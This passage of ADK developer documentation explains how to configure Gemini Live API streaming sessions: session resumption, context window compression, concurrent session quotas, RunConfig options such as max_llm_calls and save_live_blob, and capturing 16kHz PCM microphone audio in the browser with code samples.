Quotas](https://ai.google.dev/gemini-api/docs/quota) - [Vertex AI Live API](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api) ## Live API Session Resumption By default, the Live API limits connection duration to approximately 10 minutes—each WebSocket connection automatically closes after this duration. To overcome this limit and enable longer conversations, the **Live API provides [Session Resumption](https://ai.google.dev/gemini-api/docs/live#session-resumption)**, a feature that transparently migrates a session across multiple connections. When enabled, the Live API generates resumption handles that allow reconnecting to the same session context, preserving the full conversation history and state. **ADK automates this entirely**: When you enable session resumption in RunConfig, ADK automatically handles all reconnection logic—detecting connection closures, caching resumption handles, and reconnecting seamlessly in the background. You don't need to write any reconnection code. Sessions continue seamlessly beyond the 10-minute connection limit, handling connection timeouts, network disruptions, and planned reconnections automatically. ### Scope of ADK's Reconnection Management ADK manages the **ADK-to-Live API connection** (the WebSocket between ADK and the Gemini/Vertex Live API backend). This is transparent to your application code. **Your application remains responsible for**: - Managing client connections to your application (e.g., user's WebSocket to your FastAPI server) - Implementing client-side reconnection logic if needed - Handling network failures between clients and your application When ADK reconnects to the Live API, your application's event loop continues normally—you keep receiving events from `run_live()` without interruption. From your application's perspective, the Live API session continues seamlessly. **Configuration:** ```python from google.genai import types run_config = RunConfig( session_resumption=types.SessionResumptionConfig() ) ``` **When NOT to Enable Session Resumption:** While session resumption is recommended for most production applications, consider these scenarios where you might not need it: - **Short sessions (\<10 minutes)**: If your sessions typically complete within the ~10 minute connection timeout, resumption adds unnecessary overhead - **Stateless interactions**: Request-response style interactions where each turn is independent don't benefit from session continuity - **Development/testing**: Simpler debugging when each session starts fresh without carrying over state - **Cost-sensitive deployments**: Session resumption may incur additional platform costs or resource usage (verify with your platform) **Best practice**: Enable session resumption by default for production, disable only when you have a specific reason not to use it. ### How ADK Manages Session Resumption While session resumption is supported by both Gemini Live API and Vertex AI Live API, using it directly requires managing resumption handles, detecting connection closures, and implementing reconnection logic. ADK takes full responsibility for this complexity, automatically utilizing session resumption behind the scenes so developers don't need to write any reconnection code. You simply enable it in RunConfig, and ADK handles everything transparently. **ADK's automatic management:** 1. **Initial Connection**: ADK establishes a WebSocket connection to Live API 1. **Handle Updates**: Throughout the session, the Live API sends `session_resumption_update` messages containing updated handles. ADK automatically caches the latest handle in `InvocationContext.live_session_resumption_handle` 1. **Graceful Connection Close**: When the ~10 minute connection limit is reached, the WebSocket closes gracefully (no exception) 1. **Automatic Reconnection**: ADK's internal loop detects the close and automatically reconnects using the most recent cached handle 1. **Session Continuation**: The same session continues seamlessly with full context preserved Implementation Detail During reconnection, ADK retrieves the cached handle from `InvocationContext.live_session_resumption_handle` and includes it in the new `LiveConnectConfig` for the `live.connect()` call. This is handled entirely by ADK's internal reconnection loop—developers never need to access or manage these handles directly. ### Sequence Diagram: Automatic Reconnection The following sequence diagram illustrates how ADK automatically manages Live API session resumption when the ~10 minute connection timeout is reached. ADK detects the graceful close, retrieves the cached resumption handle, and reconnects transparently without application code changes: ``` sequenceDiagram participant App as Your Application participant ADK as ADK (run_live) participant WS as WebSocket Connection participant API as Live API (Gemini/Vertex AI) participant LiveSession as Live Session Context Note over App,LiveSession: Initial Connection (with session resumption enabled) App->>ADK: runner.run_live(run_config=RunConfig(session_resumption=...)) ADK->>API: WebSocket connect() activate WS API->>LiveSession: Create new session activate LiveSession Note over ADK,API: Bidirectional Streaming (0-10 minutes) App->>ADK: send_content(text) / send_realtime(audio) ADK->>API: → Content via WebSocket API->>LiveSession: Update conversation history API-->>ADK: ← Streaming response ADK-->>App: ← yield event Note over API,LiveSession: Live API sends resumption handle updates API-->>ADK: session_resumption_update { new_handle: "abc123" } ADK->>ADK: Cache handle in InvocationContext Note over WS,API: ~10 minutes elapsed - Connection timeout API->>WS: Close WebSocket (graceful close) deactivate WS Note over LiveSession: Session context preserved Note over ADK: Graceful close detected - No exception raised ADK->>ADK: while True loop continues Note over ADK,API: Automatic Reconnection ADK->>API: WebSocket connect(session_resumption.handle="abc123") activate WS API->>LiveSession: Attach to existing session API-->>ADK: Session resumed with full context Note over ADK,API: Bidirectional Streaming Continues App->>ADK: send_content(text) / send_realtime(audio) ADK->>API: → Content via WebSocket API->>LiveSession: Update conversation history API-->>ADK: ← Streaming response ADK-->>App: ← yield event Note over App,LiveSession: Session continues until duration limit or explicit close deactivate WS deactivate LiveSession ``` Events and Session Persistence For details on which events are saved to the ADK `Session` versus which are only yielded during streaming, see [Part 3: Events Saved to ADK Session](https://google.github.io/adk-docs/streaming/dev-guide/part3/#events-saved-to-adk-session). ## Live API Context Window Compression **Problem:** Live API sessions face two critical constraints that limit conversation duration. First, **session duration limits** impose hard time caps: without compression, Gemini Live API limits audio-only sessions to 15 minutes and audio+video sessions to just 2 minutes, while Vertex AI limits all sessions to 10 minutes. Second, **context window limits** restrict conversation length: models have finite token capacities (128k tokens for `gemini-2.5-flash-native-audio-preview-12-2025`, 32k-128k for Vertex AI models). Long conversations—especially extended customer support sessions, tutoring interactions, or multi-hour voice dialogues—will hit either the time limit or the token limit, causing the session to terminate or lose critical conversation history. **Solution:** [Context window compression](https://ai.google.dev/gemini-api/docs/live-session#context-window-compression) solves both constraints simultaneously. It uses a sliding-window approach to automatically compress or summarize earlier conversation history when the token count reaches a configured threshold. The Live API preserves recent context in full detail while compressing older portions. **Critically, enabling context window compression extends session duration to unlimited time**, removing the session duration limits (15 minutes for audio-only / 2 minutes for audio+video on Gemini Live API; 10 minutes for all sessions on Vertex AI) while also preventing token limit exhaustion. However, there is a trade-off: as the feature summarizes earlier conversation history rather than retaining it all, the detail of past context will be gradually lost over time. The model will have access to compressed summaries of older exchanges, not the full verbatim history. ### Platform Behavior and Official Limits Session duration management and context window compression are **Live API platform features**. ADK configures these features via RunConfig and passes the configuration to the Live API, but the actual enforcement and implementation are handled by the Gemini/Vertex AI Live API backends. **Important**: The duration limits and "unlimited" session behavior mentioned in this guide are based on current Live API behavior. These limits are subject to change by Google. Always verify current session duration limits and compression behavior in the official documentation: - [Gemini Live API Documentation](https://ai.google.dev/gemini-api/docs/live) - [Vertex AI Live API Documentation](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api) ADK provides an easy way to configure context window compression through RunConfig. However, developers are responsible for appropriately configuring the compression parameters (`trigger_tokens` and `target_tokens`) based on their specific requirements—model context window size, expected conversation patterns, and quality needs: ```python from google.genai import types from google.adk.agents.run_config import RunConfig # For gemini-2.5-flash-native-audio-preview-12-2025 (128k context window) run_config = RunConfig( context_window_compression=types.ContextWindowCompressionConfig( trigger_tokens=100000, # Start compression at ~78% of 128k context sliding_window=types.SlidingWindow( target_tokens=80000 # Compress to ~62% of context, preserving recent turns ) ) ) ``` **How it works:** When context window compression is enabled: 1. The Live API monitors the total token count of the conversation context 1. When the context reaches the `trigger_tokens` threshold, compression activates 1. Earlier conversation history is compressed or summarized using a sliding window approach 1. Recent context (last `target_tokens` worth) is preserved in full detail 1. **Two critical effects occur simultaneously:** 1. Session duration limits are removed (no more 15-minute/2-minute caps on Gemini Live API or 10-minute caps on Vertex AI) 1. Token limits are managed (sessions can continue indefinitely regardless of conversation length) **Choosing appropriate thresholds:** - Set `trigger_tokens` to 70-80% of your model's context window to allow headroom - Set `target_tokens` to 60-70% to provide sufficient compression - Test with your actual conversation patterns to optimize these values **Parameter Selection Strategy:** The examples above use 78% for `trigger_tokens` and 62% for `target_tokens`. Here's the reasoning: 1. **trigger_tokens at 78%**: Provides a buffer before hitting the hard limit 1. Allows room for the current turn to complete 1. Prevents mid-response compression interruptions 1. Typical conversations can continue for several more turns 1. **target_tokens at 62%**: Leaves substantial room after compression 1. 16 percentage points (78% - 62%) freed up per compression 1. Allows for multiple turns before next compression 1. Balances preservation of context with compression frequency 1. **Adjusting for your use case**: 1. **Long turns** (detailed technical discussions): Increase buffer → 70% trigger, 50% target 1. **Short turns** (quick Q&A): Tighter margins → 85% trigger, 70% target 1. **Context-critical** (requires historical detail): Higher target → 80% trigger, 70% target 1. **Performance-sensitive** (minimize compression overhead): Lower trigger → 70% trigger, 50% target Always test with your actual conversation patterns to find optimal values. ### When NOT to Use Context Window Compression While compression enables unlimited session duration, consider these trade-offs: **Context Window Compression Trade-offs:** | Aspect | With Compression | Without Compression | Best For | | -------------------- | ------------------------ | ------------------------------------------------- | -------------------------------------------------------------------- | | **Session Duration** | Unlimited | 15 min (audio) 2 min (video) Gemini 10 min Vertex | Compression: Long sessions No compression: Short sessions | | **Context Quality** | Older context summarized | Full verbatim history | Compression: General conversation No compression: Precision-critical | | **Latency** | Compression overhead | No overhead | Compression: Async scenarios No compression: Real-time | | **Memory Usage** | Bounded | Grows with session | Compression: Long sessions No compression: Short sessions | | **Implementation** | Configure thresholds | No configuration | Compression: Production No compression: Prototypes | **Common Use Cases:** ✅ **Enable compression when:** - Sessions need to exceed platform duration limits (15/2/10 minutes) - Extended conversations may hit token limits (128k for 2.5-flash) - Customer support sessions that can last hours - Educational tutoring with long interactions ❌ **Disable compression when:** - All sessions complete within duration limits - Precision recall of early conversation is critical - Development/testing phase (full history aids debugging) - Quality degradation from summarization is unacceptable **Best practice**: Enable compression only when you need sessions longer than platform duration limits OR when conversations may exceed context window token limits. ## Best Practices for Live API Connection and Session Management ### Essential: Enable Session Resumption - ✅ **Always enable session resumption** in RunConfig for production applications - ✅ This enables ADK to automatically handle Gemini's ~10 minute connection timeouts transparently - ✅ Sessions continue seamlessly across multiple WebSocket connections without user interruption - ✅ Session resumption handle caching and management ```python from google.genai import types run_config = RunConfig( response_modalities=["AUDIO"], session_resumption=types.SessionResumptionConfig() ) ``` ### Recommended: Enable Context Window Compression for Unlimited Sessions - ✅ **Enable context window compression** if you need sessions longer than 15 minutes (audio-only) or 2 minutes (audio+video) - ✅ Once enabled, session duration becomes unlimited—no need to monitor time-based limits - ✅ Configure `trigger_tokens` and `target_tokens` based on your model's context window - ✅ Test compression settings with realistic conversation patterns - ⚠️ **Use judiciously**: Compression adds latency during summarization and may lose conversational nuance—only enable when extended sessions are truly necessary for your use case ```python from google.genai import types from google.adk.agents.run_config import RunConfig run_config = RunConfig( response_modalities=["AUDIO"], session_resumption=types.SessionResumptionConfig(), context_window_compression=types.ContextWindowCompressionConfig( trigger_tokens=100000, sliding_window=types.SlidingWindow(target_tokens=80000) ) ) ``` ### Optional: Monitor Session Duration **Only applies if NOT using context window compression:** - ✅ Focus on **session duration limits**, not connection timeouts (ADK handles those automatically) - ✅ **Gemini Live API**: Monitor for 15-minute limit (audio-only) or 2-minute limit (audio+video) - ✅ **Vertex AI Live API**: Monitor for 10-minute session limit - ✅ Warn users 1-2 minutes before session duration limits - ✅ Implement graceful session transitions for conversations exceeding session limits ## Concurrent Live API Sessions and Quota Management **Problem:** Production voice applications typically serve multiple users simultaneously, each requiring their own Live API session. However, both Gemini Live API and Vertex AI Live API impose strict concurrent session limits that vary by platform and pricing tier. Without proper quota planning and session management, applications can hit these limits quickly, causing connection failures for new users or degraded service quality during peak usage. **Solution:** Understand platform-specific quotas, design your architecture to stay within concurrent session limits, implement session pooling or queueing strategies when needed, and monitor quota usage proactively. ADK handles individual session lifecycle automatically, but developers must architect their applications to manage multiple concurrent users within quota constraints. ### Understanding Concurrent Live API Session Quotas Both platforms limit how many Live API sessions can run simultaneously, but the limits and mechanisms differ significantly: **Gemini Live API (Google AI Studio) - Tier-based quotas:** | **Tier** | **Concurrent Sessions** | **TPM (Tokens Per Minute)** | **Access** | | ------------- | ----------------------- | --------------------------- | ----------------- | | **Free Tier** | Limited\* | 1,000,000 | Free API key | | **Tier 1** | 50 | 4,000,000 | Pay-as-you-go | | **Tier 2** | 1,000 | 10,000,000 | Higher usage tier | | **Tier 3** | 1,000 | 10,000,000 | Higher usage tier | \*Free tier concurrent session limits are not explicitly documented but are significantly lower than paid tiers. Source [Gemini API Quotas](https://ai.google.dev/gemini-api/docs/quota) **Vertex AI Live API (Google Cloud) - Project-based quotas:** | **Resource Type** | **Limit** | **Scope** | | --------------------------------------------- | -------------- | ----------------------- | | **Concurrent live bidirectional connections** | 10 per minute | Per project, per region | | **Maximum concurrent sessions** | Up to 1,000 | Per project | | **Session creation/deletion/update** | 100 per minute | Per project, per region | Source [Vertex AI Live API](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api) | [Vertex AI Quotas](https://cloud.google.com/vertex-ai/generative-ai/docs/quotas) **Requesting a quota increase:** To request an increase for Live API concurrent sessions, navigate to the [Quotas page](https://console.cloud.google.com/iam-admin/quotas) in the Google Cloud Console. Filter for the quota named **"Bidi generate content concurrent requests"** to find quota values for each project, region and base model, and submit a quota increase request. You'll need the Quota Administrator role (`roles/servicemanagement.quotaAdmin`) to make the request. See [View and manage quotas](https://cloud.google.com/docs/quotas/view-manage) for detailed instructions. **Key differences:** 1. **Gemini Live API**: Concurrent session limits scale dramatically with API tier (50 → 1,000 sessions). Best for applications with unpredictable or rapidly scaling user bases willing to pay for higher tiers. 1. **Vertex AI Live API**: Rate-limited by connection establishment rate (10/min) but supports up to 1,000 total concurrent sessions. Best for enterprise applications with gradual scaling patterns and existing Google Cloud infrastructure. Additionally, you can request quota increases to prepare for production deployments with higher concurrency requirements. ### Architectural Patterns for Managing Quotas Once you understand your concurrent session quotas, the next challenge is architecting your application to operate effectively within those limits. The right approach depends on your expected user concurrency, scaling requirements, and tolerance for queueing. This section presents two architectural patterns—from simple direct mapping for low-concurrency applications to session pooling with queueing for applications that may exceed quota limits during peak usage. Choose the pattern that matches your current scale and design it to evolve as your user base grows. **Choosing the Right Architecture:** ```text Start: Designing Quota Management | v Expected Concurrent Users? / \ < Quota Limit > Quota Limit or Unpredictable | | v v Pattern 1: Direct Mapping Pattern 2: Session Pooling - Simple 1:1 mapping - Queue waiting users - No quota logic - Graceful degradation - Fast development - Peak handling | | v v Good for: Good for: - Prototypes - Production at scale - Small teams - Unpredictable load - Controlled users - Public applications ``` **Quick Decision Guide:** | Factor | Direct Mapping | Session Pooling | | ----------------------------- | -------------------------- | ----------------------- | | **Expected users** | Always < quota | May exceed quota | | **User experience** | Always instant | May wait during peaks | | **Implementation complexity** | Low | Medium | | **Operational overhead** | None | Monitor queue depth | | **Best for** | Prototypes, internal tools | Production, public apps | #### Pattern 1: Direct Mapping (Simple Applications) For small-scale applications where concurrent users will never exceed quota limits, create a dedicated Live API session for each connected user with a simple 1:1 mapping: 1. **When a user connects:** Immediately start a `run_live()` session for them 1. **When they disconnect:** The session ends 1. **No quota management logic:** Assumes your total concurrent users will always stay below your quota limits This is the simplest possible architecture and works well for prototypes, development environments, and small-scale applications with predictable user loads. #### Pattern 2: Session Pooling with Queueing For applications that may exceed concurrent session limits during peak usage, track the number of active Live API sessions and enforce your quota limit at the application level: 1. **When a new user connects:** Check if you have available session slots 1. **If slots are available:** Start a session immediately 1. **If you've reached your quota limit:** 1. Place the user in a waiting queue 1. Notify them they're waiting for an available slot 1. **As sessions end:** Automatically process the queue to start sessions for waiting users This provides graceful degradation—users wait briefly during peak times rather than experiencing hard connection failures. ## Miscellaneous Controls ADK provides additional RunConfig options to control session behavior, manage costs, and persist audio data for debugging and compliance purposes. ```python run_config = RunConfig( # Limit total LLM calls per invocation max_llm_calls=500, # Default: 500 (prevents runaway loops) # 0 or negative = unlimited (use with caution) # Save audio/video artifacts for debugging/compliance save_live_blob=True, # Default: False # Attach custom metadata to events custom_metadata={"user_tier": "premium", "session_type": "support"}, # Default: None # Enable compositional function calling (experimental) support_cfc=True # Default: False (Gemini 2.x models only) ) ``` ### max_llm_calls This parameter caps the total number of LLM invocations allowed per invocation context, providing protection against runaway costs and infinite agent loops. **Limitation for BIDI Streaming:** **The `max_llm_calls` limit does NOT apply to `run_live()` with `StreamingMode.BIDI`.** This parameter only protects SSE streaming mode and `run_async()` flows. If you're building bidirectional streaming applications (the focus of this guide), you will NOT get automatic cost protection from this parameter. **For Live streaming sessions**, implement your own safeguards: - Session duration limits - Turn count tracking - Custom cost monitoring by tracking token usage in model turn events (see [Part 3: Event Types and Handling](https://google.github.io/adk-docs/streaming/dev-guide/part3/#event-types-and-handling)) - Application-level circuit breakers ### save_live_blob This parameter controls whether audio and video streams are persisted to ADK's session and artifact services for debugging, compliance, and quality assurance purposes. Migration Note: save_live_audio Deprecated **If you're using `save_live_audio`:** This parameter has been deprecated in favor of `save_live_blob`. ADK will automatically migrate `save_live_audio=True` to `save_live_blob=True` with a deprecation warning, but this compatibility layer will be removed in a future release. Update your code to use `save_live_blob` instead. Currently, **only audio is persisted** by ADK's implementation. When enabled, ADK persists audio streams to: - **[Session service](https://google.github.io/adk-docs/sessions/)**: Conversation history includes audio references - **[Artifact service](https://google.github.io/adk-docs/artifacts/)**: Audio files stored with unique IDs **Use cases:** - **Debugging**: Voice interaction issues, assistant behavior analysis - **Compliance**: Audit trails for regulated industries (healthcare, financial services) - **Quality Assurance**: Monitoring conversation quality, identifying issues - **Training Data**: Collecting data for model improvement - **Development/Testing**: Testing environments and cost-sensitive deployments **Storage considerations:** Enabling `save_live_blob=True` has significant storage implications: - **Audio file sizes**: At 16kHz PCM, audio input generates ~1.92 MB per minute - **Session storage**: Audio is stored in both session service and artifact service - **Retention policy**: Check your artifact service configuration for retention periods - **Cost impact**: Storage costs can accumulate quickly for high-volume voice applications **Best practices:** - Enable only when needed (debugging, compliance, training) - Implement retention policies to auto-delete old audio artifacts - Consider sampling (e.g., save 10% of sessions for quality monitoring) - Use compression if supported by your artifact service ### custom_metadata This parameter allows you to attach arbitrary key-value metadata to events generated during the current invocation. The metadata is stored in the `Event.custom_metadata` field and persisted to session storage, enabling you to tag events with application-specific context for analytics, debugging, routing, or compliance tracking. **Configuration:** ```python from google.adk.agents.run_config import RunConfig # Attach metadata to all events in this invocation run_config = RunConfig( custom_metadata={ "user_tier": "premium", "session_type": "customer_support", "campaign_id": "promo_2025", "ab_test_variant": "variant_b" } ) ``` **How it works:** When you provide `custom_metadata` in RunConfig: 1. **Metadata attachment**: The dictionary is attached to every `Event` generated during the invocation 1. **Session persistence**: Events with metadata are stored in the session service (database, Vertex AI, or in-memory) 1. **Event access**: Retrieve metadata from any event via `event.custom_metadata` 1. **A2A integration**: For Agent-to-Agent (A2A) communication, ADK automatically propagates A2A request metadata to this field **Type specification:** ```python custom_metadata: Optional[dict[str, Any]] = None ``` The metadata is a flexible dictionary accepting any JSON-serializable values (strings, numbers, booleans, nested objects, arrays). **Use cases:** - **User segmentation**: Tag events with user tier, subscription level, or cohort information - **Session classification**: Label sessions by type (support, sales, onboarding) for analytics - **Campaign tracking**: Associate events with marketing campaigns or experiments - **A/B testing**: Track which variant of your application generated the event - **Compliance**: Attach jurisdiction, consent flags, or data retention policies - **Debugging**: Add trace IDs, feature flags, or environment identifiers - **Analytics**: Store custom dimensions for downstream analysis **Example - Retrieving metadata from events:** ```python async for event in runner.run_live( session=session, live_request_queue=queue, run_config=RunConfig( custom_metadata={"user_id": "user_123", "experiment": "new_ui"} ) ): if event.custom_metadata: print(f"User: {event.custom_metadata.get('user_id')}") print(f"Experiment: {event.custom_metadata.get('experiment')}") ``` **Agent-to-Agent (A2A) integration:** When using `RemoteA2AAgent`, ADK automatically extracts metadata from A2A requests and populates `custom_metadata`: ```python # A2A request metadata is automatically mapped to custom_metadata # Source: a2a/converters/request_converter.py custom_metadata = { "a2a_metadata": { # Original A2A request metadata appears here } } ``` This enables seamless metadata propagation across agent boundaries in multi-agent architectures. **Best practices:** - Use consistent key naming conventions across your application - Avoid storing sensitive data (PII, credentials) in metadata—use encryption if necessary - Keep metadata size reasonable to minimize storage overhead - Document your metadata schema for team consistency - Consider using metadata for session filtering and search in production debugging ### support_cfc (Experimental) This parameter enables Compositional Function Calling (CFC), allowing the model to orchestrate multiple tools in sophisticated patterns—calling tools in parallel, chaining outputs as inputs to other tools, or conditionally executing tools based on intermediate results. **⚠️ Experimental Feature:** CFC support is experimental and subject to change. **Critical behavior:** When `support_cfc=True`, ADK **always uses the Live API** (WebSocket) internally, regardless of the `streaming_mode` setting. This is because only the Live API backend supports CFC capabilities. ```python # Even with SSE mode, ADK routes through Live API when CFC is enabled run_config = RunConfig( support_cfc=True, streaming_mode=StreamingMode.SSE # ADK uses Live API internally ) ``` **Model requirements:** ADK validates CFC compatibility at session initialization and will raise an error if the model is unsupported: - ✅ **Supported**: `gemini-2.x` models (e.g., `gemini-2.5-flash-native-audio-preview-12-2025`) - ❌ **Not supported**: `gemini-1.5-x` models - **Validation**: ADK checks that the model name starts with `gemini-2` when `support_cfc=True` ([`runners.py:1322-1328`](https://github.com/google/adk-python/blob/fd2c0f556b786417a9f6add744827b07e7a06b7d/src/google/adk/runners.py#L1361-L1367)) - **Code executor**: ADK automatically injects `BuiltInCodeExecutor` when CFC is enabled for safe parallel tool execution **CFC capabilities:** - **Parallel execution**: Call multiple independent tools simultaneously (e.g., fetch weather for multiple cities at once) - **Function chaining**: Use one tool's output as input to another (e.g., `get_location()` → `get_weather(location)`) - **Conditional execution**: Execute tools based on intermediate results from prior tool calls **Use cases:** CFC is designed for complex, multi-step workflows that benefit from intelligent tool orchestration: - Data aggregation from multiple APIs simultaneously - Multi-step analysis pipelines where tools feed into each other - Complex research tasks requiring conditional exploration - Any scenario needing sophisticated tool coordination beyond sequential execution **For bidirectional streaming applications:** While CFC works with BIDI mode, it's primarily optimized for text-based tool orchestration. For real-time audio/video interactions (the focus of this guide), standard function calling typically provides better performance and simpler implementation. **Learn more:** - [Gemini Function Calling Guide](https://ai.google.dev/gemini-api/docs/function-calling) - Official documentation on compositional and parallel function calling - [ADK Parallel Functions Example](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/contributing/samples/parallel_functions/agent.py) - Working example with async tools - [ADK Performance Guide](https://google.github.io/adk-docs/tools/performance/) - Best practices for parallel-ready tools ## Summary In this part, you learned how RunConfig enables sophisticated control over ADK Bidi-streaming sessions through declarative configuration. We covered response modalities and their constraints, explored the differences between BIDI and SSE streaming modes, examined the relationship between ADK Sessions and Live API sessions, and learned how to manage session duration with session resumption and context window compression. You now understand how to handle concurrent session quotas, implement architectural patterns for quota management, configure cost controls through `max_llm_calls` and audio persistence options. With RunConfig mastery, you can build production-ready streaming applications that balance feature richness with operational constraints—enabling extended conversations, managing platform limits, controlling costs effectively, and monitoring resource consumption. ______________________________________________________________________ ← [Previous: Part 3: Event Handling with run_live()](https://google.github.io/adk-docs/streaming/dev-guide/part3/index.md) | [Next: Part 5: How to Use Audio, Image and Video](https://google.github.io/adk-docs/streaming/dev-guide/part5/index.md) → # Part 5: How to Use Audio, Image and Video This section covers audio, image and video capabilities in ADK's Live API integration, including supported models, audio model architectures, specifications, and best practices for implementing voice and video features. ## How to Use Audio Live API's audio capabilities enable natural voice conversations with sub-second latency through bidirectional audio streaming. This section covers how to send audio input to the model and receive audio responses, including format requirements, streaming best practices, and client-side implementation patterns. ### Sending Audio Input **Audio Format Requirements:** Before calling `send_realtime()`, ensure your audio data is already in the correct format: - **Format**: 16-bit PCM (signed integer) - **Sample Rate**: 16,000 Hz (16kHz) - **Channels**: Mono (single channel) ADK does not perform audio format conversion. Sending audio in incorrect formats will result in poor quality or errors. Demo implementation: [main.py:181-184](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L181-L184) ```python audio_blob = types.Blob( mime_type="audio/pcm;rate=16000", data=audio_data ) live_request_queue.send_realtime(audio_blob) ``` #### Best Practices for Sending Audio Input 1. **Chunked Streaming**: Send audio in small chunks for low latency. Choose chunk size based on your latency requirements: - **Ultra-low latency** (real-time conversation): 10-20ms chunks (~320-640 bytes @ 16kHz) - **Balanced** (recommended): 50-100ms chunks (~1600-3200 bytes @ 16kHz) - **Lower overhead**: 100-200ms chunks (~3200-6400 bytes @ 16kHz) Use consistent chunk sizes throughout the session for optimal performance. Example: 100ms @ 16kHz = 16000 samples/sec × 0.1 sec × 2 bytes/sample = 3200 bytes. 1. **Prompt Forwarding**: ADK's `LiveRequestQueue` forwards each chunk promptly without coalescing or batching. Choose chunk sizes that meet your latency and bandwidth requirements. Don't wait for model responses before sending next chunks. 1. **Continuous Processing**: The model processes audio continuously, not turn-by-turn. With automatic VAD enabled (the default), just stream continuously and let the API detect speech. 1. **Activity Signals**: Use `send_activity_start()` / `send_activity_end()` only when you explicitly disable VAD for manual turn-taking control. VAD is enabled by default, so activity signals are not needed for most applications. #### Handling Audio Input at the Client In browser-based applications, capturing microphone audio and sending it to the server requires using the Web Audio API with AudioWorklet processors. The bidi-demo demonstrates how to capture microphone input, convert it to the required 16-bit PCM format at 16kHz, and stream it continuously to the WebSocket server. **Architecture:** 1. **Audio capture**: Use Web Audio API to access microphone with 16kHz sample rate 1. **Audio processing**: AudioWorklet processor captures audio frames in real-time 1. **Format conversion**: Convert Float32Array samples to 16-bit PCM 1. **WebSocket streaming**: Send PCM chunks to server via WebSocket Demo implementation: [audio-recorder.js:7-58](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/static/js/audio-recorder.js#L7-L58) ```javascript // Start audio recorder worklet export async function startAudioRecorderWorklet(audioRecorderHandler) { // Create an AudioContext with 16kHz sample rate // This matches the Live API's required input format (16-bit PCM @ 16kHz) const audioRecorderContext = new AudioContext({ sampleRate: 16000 }); // Load the AudioWorklet module that will process audio in real-time // AudioWorklet runs on a separate thread for low-latency, glitch-free audio processing const workletURL = new URL("./pcm-recorder-processor.js", import.meta.url); await audioRecorderContext.audioWorklet.addModule(workletURL); // Request access to the user's microphone // channelCount: 1 requests mono audio (single channel) as required by Live API micStream = await navigator.mediaDevices.getUserMedia({ audio: { channelCount: 1 } }); const source = audioRecorderContext.createMediaStreamSource(micStream); // Create an AudioWorkletNode that uses our custom PCM recorder processor // This node will capture audio frames and send them to our handler const audioRecorderNode = new AudioWorkletNode( audioRecorderContext, "pcm-recorder-processor" ); // Connect the microphone source to the worklet processor // The processor will receive audio frames and post them via port.postMessage source.connect(audioRecorderNode); audioRecorderNode.port.onmessage = (event) => { // Convert Float32Array to 16-bit PCM format required by Live API const pcmData = convertFloat32ToPCM(event.data); // Send the PCM data to the handler (which will forward to WebSocket) audioRecorderHandler(pcmData); }; return [audioRecorderNode, audioRecorderContext, micStream]; } // Convert Float32 samples to 16-bit PCM function convertFloat32ToPCM(inputData) { // Create an Int16Array of the same length const pcm16 = new Int16Array(inputData.length); for (let i = 0; i < inputData.length; i++) { // Web Audio API provides Float32 samples in range [-1.0, 1.0] // Multiply by 0x7fff (32767) to convert to 16-bit signed integer range [-32768, 32767] pcm16[i] = inputData[i] * 0x7fff; } // Return the underlying ArrayBuffer (binary data) for efficient transmission return pcm16.buffer; } ``` Demo implementation: [pcm-recorder-processor.js:1-18](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/static/js/pcm-recorder-processor.js#L1-L18) ```javascript // pcm-recorder-processor.js - AudioWorklet processor for capturing audio class PCMProcessor extends AudioWorkletProcessor { constructor() { super(); } process(inputs, outputs, parameters) { if (inputs.length > 0 && inputs[0].length > 0) { // Use the first channel (mono) const inputChannel = inputs[0][0]; // Copy the buffer to avoid issues with recycled memory const inputCopy = new Float32Array(inputChannel); this.port.postMessage(inputCopy); } return true; } } registerProcessor("pcm-recorder-processor", PCMProcessor); ``` Demo implementation: [app.js:977-986](https://github.com/google/adk-samples/blob/2f7b82f182659e0990bfb86f6ef400dd82633c07/python/agents/bidi-demo/app/static/js/app.js#L979-L988) ```javascript // Audio recorder handler - called for each audio chunk function audioRecorderHandler(pcmData) { if (websocket && websocket.readyState === WebSocket.OPEN && is_audio) { // Send audio as binary WebSocket frame (more efficient than base64 JSON) websocket.send(pcmData); console.log("[CLIENT TO AGENT] Sent audio chunk: %s bytes", pcmData.byteLength); } } ``` **Key Implementation Details:** 1. **16kHz Sample Rate**: The AudioContext must be created with `sampleRate: 16000` to match Live API requirements. Modern browsers support this rate. 1. **Mono Audio**: Request single-channel audio (`channelCount: 1`) since Live API expects mono input. This reduces bandwidth and processing overhead. 1. **AudioWorklet Processing**: AudioWorklet runs on a separate thread from the main JavaScript thread, ensuring low-latency, glitch-free audio processing without blocking the UI. 1. **Float32 to PCM16 Conversion**: Web Audio API provides audio as Float32Array values in range [-1.0, 1.0]. Multiply by 32767 (0x7fff) to convert to 16-bit signed integer PCM. 1. **Binary WebSocket Frames**: Send PCM data directly as ArrayBuffer via WebSocket binary frames instead of base64-encoding in JSON. This reduces bandwidth by ~33% and eliminates encoding/decoding overhead. 1. **Continuous Streaming**: The AudioWorklet `process()` method is called automatically at regular intervals (typically 128 samples at a time for 16kHz). This provides consistent chunk sizes for streaming. This architecture ensures low-latency audio capture and efficient transmission to the server, which then forwards it to the ADK Live API via `LiveRequestQueue.send_realtime()`. ### Receiving Audio Output When `response_modalities=["AUDIO"]` is configured, the model returns audio data in the event stream as `inline_data` parts. **Audio Format Requirements:** The model outputs audio in the following format: - **Format**: 16-bit PCM (signed integer) - **Sample Rate**: 24,000 Hz (24kHz) for native audio models - **Channels**: Mono (single channel) - **MIME Type**: `audio/pcm;rate=24000` The audio data arrives as raw PCM bytes, ready for playback or further processing. No additional conversion is required unless you need a different sample rate or format. **Receiving Audio Output:** ```python from google.adk.agents.run_config import RunConfig, StreamingMode # Configure for audio output run_config = RunConfig( response_modalities=["AUDIO"], # Required for audio responses streaming_mode=StreamingMode.BIDI ) # Process audio output from the model async for event in runner.run_live( user_id="user_123", session_id="session_456", live_request_queue=live_request_queue, run_config=run_config ): # Events may contain multiple parts (text, audio, etc.) if event.content and event.content.parts: for part in event.content.parts: # Audio data arrives as inline_data with audio/pcm MIME type if part.inline_data and part.inline_data.mime_type.startswith("audio/pcm"): # The data is already decoded to 